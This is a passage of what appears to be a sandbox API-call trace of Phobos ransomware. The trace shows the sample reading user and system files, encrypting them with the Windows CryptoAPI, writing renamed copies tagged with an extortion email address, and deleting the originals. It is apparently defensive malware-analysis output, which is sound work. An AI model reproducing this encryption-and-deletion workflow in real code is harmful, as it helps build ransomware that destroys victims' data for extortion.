HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst")) returned 0x2020 [0123.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.615] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0123.615] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0123.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0123.616] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf954 | out: phKey=0x3dcf954*=0x29c4a0) returned 1 [0123.616] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0123.616] ReadFile (in: hFile=0x348, lpBuffer=0x43d0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3dcf97c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3dcf97c*=0xcfc4, lpOverlapped=0x0) returned 1 [0123.665] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0xcfd0, dwBufLen=0xcfd0 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0xcfd0) returned 1 [0123.665] WriteFile (in: hFile=0x34c, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xcfd0, lpNumberOfBytesWritten=0x3dcf960, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf960*=0xcfd0, lpOverlapped=0x0) returned 1 [0123.668] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf958 | out: phKey=0x3dcf958*=0x29c520) returned 1 [0123.668] CryptSetKeyParam (hKey=0x29c520, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0123.668] CryptEncrypt (in: hKey=0x29c520, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x40, dwBufLen=0x40 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x40) returned 1 [0123.668] CryptDestroyKey (hKey=0x29c520) returned 1 [0123.668] WriteFile (in: hFile=0x34c, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3dcf960, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf960*=0xf2, lpOverlapped=0x0) returned 1 [0123.668] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0123.668] CloseHandle (hObject=0x348) returned 1 [0123.669] CloseHandle (hObject=0x34c) returned 1 [0123.671] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst")) returned 1 [0123.673] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0123.688] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=5120) returned 1 [0123.688] CloseHandle (hObject=0x34c) returned 1 [0123.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents")) returned 0x2020 [0123.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0123.689] SetFilePointerEx (in: hFile=0x34c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0123.689] SetFilePointerEx (in: hFile=0x34c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0123.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.689] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf954 | out: phKey=0x3dcf954*=0x29c4a0) returned 1 [0123.689] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0123.689] ReadFile (in: hFile=0x34c, lpBuffer=0x43d0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3dcf97c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3dcf97c*=0x1400, lpOverlapped=0x0) returned 1 [0124.188] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x1410, dwBufLen=0x1410 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x1410) returned 1 [0124.188] WriteFile (in: hFile=0x348, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x3dcf960, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf960*=0x1410, lpOverlapped=0x0) returned 1 [0124.189] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf958 | out: phKey=0x3dcf958*=0x29c5a0) returned 1 [0124.189] CryptSetKeyParam (hKey=0x29c5a0, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0124.189] CryptEncrypt (in: hKey=0x29c5a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x50, dwBufLen=0x50 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x50) returned 1 [0124.189] CryptDestroyKey (hKey=0x29c5a0) returned 1 [0124.189] WriteFile (in: hFile=0x348, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3dcf960, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf960*=0x102, lpOverlapped=0x0) returned 1 [0124.189] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0124.189] CloseHandle (hObject=0x34c) returned 1 [0124.189] CloseHandle (hObject=0x348) returned 1 [0124.200] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents")) returned 1 [0124.202] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0124.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0124.202] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2676) returned 1 [0124.202] CloseHandle (hObject=0x348) returned 1 [0124.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc")) returned 0x2020 [0124.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0124.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0124.202] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0124.203] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0124.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0124.205] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf954 | out: phKey=0x3dcf954*=0x29c4a0) returned 1 [0124.205] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0124.205] ReadFile (in: hFile=0x348, lpBuffer=0x43d0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3dcf97c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3dcf97c*=0xa74, lpOverlapped=0x0) returned 1 [0124.575] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0xa80, dwBufLen=0xa80 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0xa80) returned 1 [0124.575] WriteFile (in: hFile=0x34c, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x3dcf960, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf960*=0xa80, lpOverlapped=0x0) returned 1 [0124.576] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf958 | out: phKey=0x3dcf958*=0x29c4e0) returned 1 [0124.576] CryptSetKeyParam (hKey=0x29c4e0, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0124.576] CryptEncrypt (in: hKey=0x29c4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x40, dwBufLen=0x40 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf918*=0x40) returned 1 [0124.576] CryptDestroyKey (hKey=0x29c4e0) returned 1 [0124.576] WriteFile (in: hFile=0x34c, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3dcf960, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf960*=0xf2, lpOverlapped=0x0) returned 1 [0124.576] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0124.576] CloseHandle (hObject=0x348) returned 1 [0124.576] CloseHandle (hObject=0x34c) returned 1 [0124.577] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc")) returned 1 [0124.578] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf948, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf9b0 | out: phKey=0x3dcf9b0*=0x29c4a0) returned 1 [0124.578] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3dcf998, dwFlags=0x0) returned 1 [0124.578] CryptDecrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x3dcf964 | out: pbData=0x1db1470, pdwDataLen=0x3dcf964) returned 1 [0124.578] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0124.578] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0124.578] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0124.578] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0124.578] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 Thread: id = 106 os_tid = 0x7b4 [0112.522] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fe0070 [0112.522] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3ff0078 [0112.523] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db9ac0 [0112.523] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x110102) returned 0x44f0020 [0112.523] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db9af0 [0112.523] CryptImportKey (in: hProv=0x254d70, pbData=0x3f8f830, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3f8f898 | out: phKey=0x3f8f898*=0x29c1a0) returned 1 [0112.523] CryptSetKeyParam (hKey=0x29c1a0, dwParam=0x1, pbData=0x3f8f880, dwFlags=0x0) returned 1 [0112.523] CryptDecrypt (in: hKey=0x29c1a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x3f8f84c | out: pbData=0x1db9af0, pdwDataLen=0x3f8f84c) returned 1 [0112.523] CryptDestroyKey (hKey=0x29c1a0) returned 1 [0112.523] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0112.523] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0112.523] Wow64DisableWow64FsRedirection (in: OldValue=0x3f8f8e4 | out: OldValue=0x3f8f8e4*=0x0) returned 1 [0112.523] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0112.523] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.524] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=129745) returned 1 [0112.524] CloseHandle (hObject=0x2a0) returned 1 [0112.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png")) returned 0x20 [0112.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.524] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0112.556] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=1897) returned 1 [0112.556] CloseHandle (hObject=0x2b0) returned 1 [0112.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml")) returned 0x20 [0112.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.557] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.557] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.751] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.752] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.759] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.761] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.763] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.764] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.765] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.767] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.768] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.770] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.772] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.773] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.773] ResetEvent (hEvent=0x278) returned 1 [0112.773] SetEvent (hEvent=0x27c) returned 1 [0112.773] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.773] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.774] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.774] CloseHandle (hObject=0x314) returned 1 [0112.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp")) returned 0x20 [0112.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.775] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.775] ResetEvent (hEvent=0x278) returned 1 [0112.775] SetEvent (hEvent=0x27c) returned 1 [0112.775] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.775] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.775] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.776] CloseHandle (hObject=0x314) returned 1 [0112.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp")) returned 0x20 [0112.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.776] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0112.776] ResetEvent (hEvent=0x278) returned 1 [0112.776] SetEvent (hEvent=0x27c) returned 1 [0112.776] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3f8f8e8 | out: pbBuffer=0x3f8f8e8) returned 1 [0112.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0112.777] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x3f8f888 | out: lpFileSize=0x3f8f888*=49208) returned 1 [0112.777] CloseHandle (hObject=0x314) returned 1 [0112.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp")) returned 